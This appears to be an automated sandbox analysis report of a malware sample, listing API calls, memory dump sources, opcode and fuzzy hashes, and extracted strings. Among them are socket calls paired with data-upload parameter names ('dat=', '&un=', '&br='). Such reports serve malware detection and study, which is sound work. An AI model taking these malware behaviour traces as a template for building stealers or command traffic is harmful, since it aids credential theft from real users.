                                                                                    • Opcode Fuzzy Hash: e6eabccd4381a936839e65650382af6e11fe89b1f28641763965f83b4025886b
                                                                                    • Instruction Fuzzy Hash: 4B90022A211510031105B558574550B00568BD5351395C022F1015550CDA2189615121
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7f2cb5963a27f10596b587cd4128078c4ce00c668e9fec5fd27c56d945177084
                                                                                    • Instruction ID: 139ee3ff127c57770c7cfaf9aaa1f666823bcfec16eacd5a839215cce8e397f5
                                                                                    • Opcode Fuzzy Hash: 7f2cb5963a27f10596b587cd4128078c4ce00c668e9fec5fd27c56d945177084
                                                                                    • Instruction Fuzzy Hash: FD90022A221510021145B558564550F04559BD63513D5C016F1416590CCA2189655321
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000007D0), ref: 03023C9B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: net.dll$wininet.dll
                                                                                    • API String ID: 3472027048-1269752229
                                                                                    • Opcode ID: 8d82e1f8c2f85837880e0bdd9c7dedb4ca43be27d8588d44f07e26a411c768b7
                                                                                    • Instruction ID: 4066600ab8fb6cb8f751fb8c892e6212a99b86c4fd0d465b01c0682fcafe9611
                                                                                    • Opcode Fuzzy Hash: 8d82e1f8c2f85837880e0bdd9c7dedb4ca43be27d8588d44f07e26a411c768b7
                                                                                    • Instruction Fuzzy Hash: 2F316EB5602715BBD714DFA4CC80FEBBBB9FB88710F144559E919AB280D374AA40CBA4
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: 7f947d0f90d277a259a2254258f86a3f2acb77a42b713b0cce0639a39238ae61
                                                                                    • Instruction ID: 21afa284e28edb31fc33ca1b58adcf1e3c002fc3545ab0660d37d419b04db48c
                                                                                    • Opcode Fuzzy Hash: 7f947d0f90d277a259a2254258f86a3f2acb77a42b713b0cce0639a39238ae61
                                                                                    • Instruction Fuzzy Hash: E1312FB6A1060AAFDB00DFD8D8809EFB7B9FF88304B148559E505EB214D775EE05CBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeUninitialize
                                                                                    • String ID: @J7<
                                                                                    • API String ID: 3442037557-2016760708
                                                                                    • Opcode ID: 5d2add8fe2347f129de0a447a56305ea7e9c16457bcf4eb0b417769999782aa6
                                                                                    • Instruction ID: 5f9cc71094290cf2cea76c9367744ff7f96c15952f5b3a78f61df787a89637cd
                                                                                    • Opcode Fuzzy Hash: 5d2add8fe2347f129de0a447a56305ea7e9c16457bcf4eb0b417769999782aa6
                                                                                    • Instruction Fuzzy Hash: 6C3132B6A0060AAFDB00DFD8D8809EFB7B9FF88304B148559E505EB214D775EE05CBA0
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030146C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction ID: 0439ee93638020508fc409f9a62966bb35101f28f01e825f5ec328bedc55bf86
                                                                                    • Opcode Fuzzy Hash: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction Fuzzy Hash: 27015EBAE0120DABDB10DBE1DC41FDDB7B89B54308F0481A5E9089B250FA31E7188B91
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,0301841E,00000010,00000000,?,?,00000044,00000000,00000010,0301841E,?,?,00000000), ref: 03029A63
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: f44209bbd5e9ad90f10f44b1f22fe67f40c738fdc67aed1c66a4cbf11cdf456e
                                                                                    • Instruction ID: 894df519019454d94c3661f1399441d3318755e7a1880a8f1a288873ef2fdf3b
                                                                                    • Opcode Fuzzy Hash: f44209bbd5e9ad90f10f44b1f22fe67f40c738fdc67aed1c66a4cbf11cdf456e
                                                                                    • Instruction Fuzzy Hash: 2A01C0B6215208BFCB44DF99DC80EDB77ADAF8D754F408108FA1DA7240D630F8518BA4
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 9729daee34e36f090933b1b24afea412076cd2ae6227c0d2c387de267186fa96
                                                                                    • Instruction ID: 00dd9a51271751d66074c13360006a5e2d58674e146d2d79f15b061becbd025c
                                                                                    • Opcode Fuzzy Hash: 9729daee34e36f090933b1b24afea412076cd2ae6227c0d2c387de267186fa96
                                                                                    • Instruction Fuzzy Hash: 16F0397B3857147AF220A5E99C02FDBB68C9B81AA1F140025FB0CEA1C0D995B80242A9
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03009E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: b7976a58c2de71c4577e8520ea41a7750b5dedcc816b9e662e0346ca6d9cb5f8
                                                                                    • Instruction ID: 59cf61082c992502dea80865620663172f543ec1d4dab67b134b8805ddad59cb
                                                                                    • Opcode Fuzzy Hash: b7976a58c2de71c4577e8520ea41a7750b5dedcc816b9e662e0346ca6d9cb5f8
                                                                                    • Instruction Fuzzy Hash: BFF0927B7417107AF230AAE48C02FC7B6589F81BA1F150114F708AF1C0DAA5780187A5
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(03011B69,?,03025ED1,03011B69,?,03025ED1,?,03011B69,030257BF,00001000,?,00000000), ref: 0302995F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: eac7b7826e2e82e196d20feb5be9869bea6dc39668a5f8f93e263b85d279cf1c
                                                                                    • Instruction ID: 06538a8856650e93547630cb9ad0c6e79c3b14ca9f151b86d60b310ee4517285
                                                                                    • Opcode Fuzzy Hash: eac7b7826e2e82e196d20feb5be9869bea6dc39668a5f8f93e263b85d279cf1c
                                                                                    • Instruction Fuzzy Hash: AAE032BA200314BBE614EA98DC40FEB77ACEBC9710F004019F909AB241DA20B9118AB5
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B00017E,00000007,00000000,00000004,00000000,03013EF6,000000F4), ref: 030299AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 10e78dc5911c11bf1ba16f4a6a310104beaa8b86ec4fe8ff6c030c8a8362ebdc
                                                                                    • Instruction ID: 53710b809653845384cde777e8e2d42d72d3101240a59673d0345947b985624a
                                                                                    • Opcode Fuzzy Hash: 10e78dc5911c11bf1ba16f4a6a310104beaa8b86ec4fe8ff6c030c8a8362ebdc
                                                                                    • Instruction Fuzzy Hash: CCE0397A2003047FD614EE59DC40F9B37ACDBC5710F408018F918A7241CA70B81187B5
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301848C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 785834ad9b7a0a25a7fe3e86688d979d84857120df23c7f05a8106eebc302e59
                                                                                    • Instruction ID: 30dc379619d80b03b3ae9ea9e6c3045e882284d3e51212e605ff1a7d170f8aa8
                                                                                    • Opcode Fuzzy Hash: 785834ad9b7a0a25a7fe3e86688d979d84857120df23c7f05a8106eebc302e59
                                                                                    • Instruction Fuzzy Hash: 9FE0207160030467E734D5A8DC41F633388574C638F0C8650FA1CCB9C1D578F5114150
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0301848C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 72a81d3bfc2b94c72575b981efc9c0de1cb302cba50d77803bb7954b2e02d500
                                                                                    • Instruction ID: 9fad4df8a42c115ea80917e0ec41b9760fccbd455b506fe1930946bd0bd1ef75
                                                                                    • Opcode Fuzzy Hash: 72a81d3bfc2b94c72575b981efc9c0de1cb302cba50d77803bb7954b2e02d500
                                                                                    • Instruction Fuzzy Hash: B1E0D8726003006BE73496788C45B9677546B8A238F0C8750F5989F9C1D774E2128240
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,03011E60,030280FF,?,03011E30), ref: 03018283
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: d2c0cdfa6be24378bf2234a29427524c706c9e763b053ae8809cbb78714bba8f
                                                                                    • Instruction ID: 316eac8a3abf2d4456333592017b3e996f191f939e20ab021b613ef5fc43a9df
                                                                                    • Opcode Fuzzy Hash: d2c0cdfa6be24378bf2234a29427524c706c9e763b053ae8809cbb78714bba8f
                                                                                    • Instruction Fuzzy Hash: 58D0A7BA7453047BF645E7F4CC02F9672CC9B82764F088064FA0CDB2C1ED64F1004665
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111), ref: 03010F37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742545018.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4eb0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4740507433.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_3000000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742545018.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4eb0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                    • API String ID: 0-3558027158
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742545018.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4eb0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #><=$$[eb$,BX,$,[eb$,hi7$,~z6$7,Y7$9"<,$9,Je$:$:"<7$<<==$="5"$>%,K$Acve$``m#$iogc$t#?"$~ijc
                                                                                    • API String ID: 0-4132280230
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05044725
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 05044787
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050446FC
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05044742
                                                                                    • ExecuteOptions, xrefs: 050446A0
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05044655
                                                                                    • Execute=1, xrefs: 05044713
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    Strings
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050402BD
                                                                                    • RTL: Re-Waiting, xrefs: 0504031E
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050402E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    Strings
                                                                                    • RTL: Resource at %p, xrefs: 05047B8E
                                                                                    • RTL: Re-Waiting, xrefs: 05047BAC
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05047B7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0504728C
                                                                                    Strings
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05047294
                                                                                    • RTL: Resource at %p, xrefs: 050472A3
                                                                                    • RTL: Re-Waiting, xrefs: 050472C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.00000000050CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_10_2_4fa0000_fontview.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                                                                                    • Instruction ID: 0c04c3f69b0ec78f2c91bc310075ccc09c8ec31ea36fa6a376005840e36f3a60
                                                                                    • Opcode Fuzzy Hash: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                                                                                    • Instruction Fuzzy Hash: 2C812CB5D002699BDB31CF94CC45BEEB7B9AF08714F0441EAA909B7240D770AE85CFA0

                                                                                    Execution Graph

                                                                                    Execution Coverage:3%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:29
                                                                                    Total number of Limit Nodes:4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 04CE0222
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.4743693637.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_4cc0000_LiiDBuNLRIYu.jbxd
                                                                                    Similarity
                                                                                    • API ID: setsockopt
                                                                                    • String ID: &br=9$&un=$80$dat=
                                                                                    • API String ID: 3981526788-3709368510
                                                                                    • Opcode ID: 706fa655e954c4611db633b65ee223980f4897cd1107005bdeee329eeab4cf1e
                                                                                    • Instruction ID: ed3806390d5382f37425fb1853c6cc248041c7645a3486f881a8b089f2d806cb
                                                                                    • Opcode Fuzzy Hash: 706fa655e954c4611db633b65ee223980f4897cd1107005bdeee329eeab4cf1e
                                                                                    • Instruction Fuzzy Hash: F8429571A00205AFDB28DFA5D890BFEB3B6FF48304F14856DE61A9B241E770B545CBA1

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 190 4d04009-4d04043 call 4cdb7b9 call 4d04c09 closesocket
                                                                                    APIs
                                                                                    • closesocket.WS2_32(04CE02C7,04D021A8,?,?,04CE02C7,?,000000FF), ref: 04D0403E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.4743693637.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_11_2_4cc0000_LiiDBuNLRIYu.jbxd
                                                                                    Similarity
                                                                                    • API ID: closesocket
                                                                                    • String ID:
                                                                                    • API String ID: 2781271927-0
                                                                                    • Opcode ID: eeecaf2e310d1f5b42629169f254ba9c9d46488a509d5f10f91667a84d8a84df
                                                                                    • Instruction ID: 49e8f3d7501295d753c841f2e917e1d68b6125f285b011533f3a068d3bf1a957
                                                                                    • Opcode Fuzzy Hash: eeecaf2e310d1f5b42629169f254ba9c9d46488a509d5f10f91667a84d8a84df
                                                                                    • Instruction Fuzzy Hash: 37E08C763006047BD210EAAADC40EAB776CDFC6310F014515FE0CA7241D671B90087F1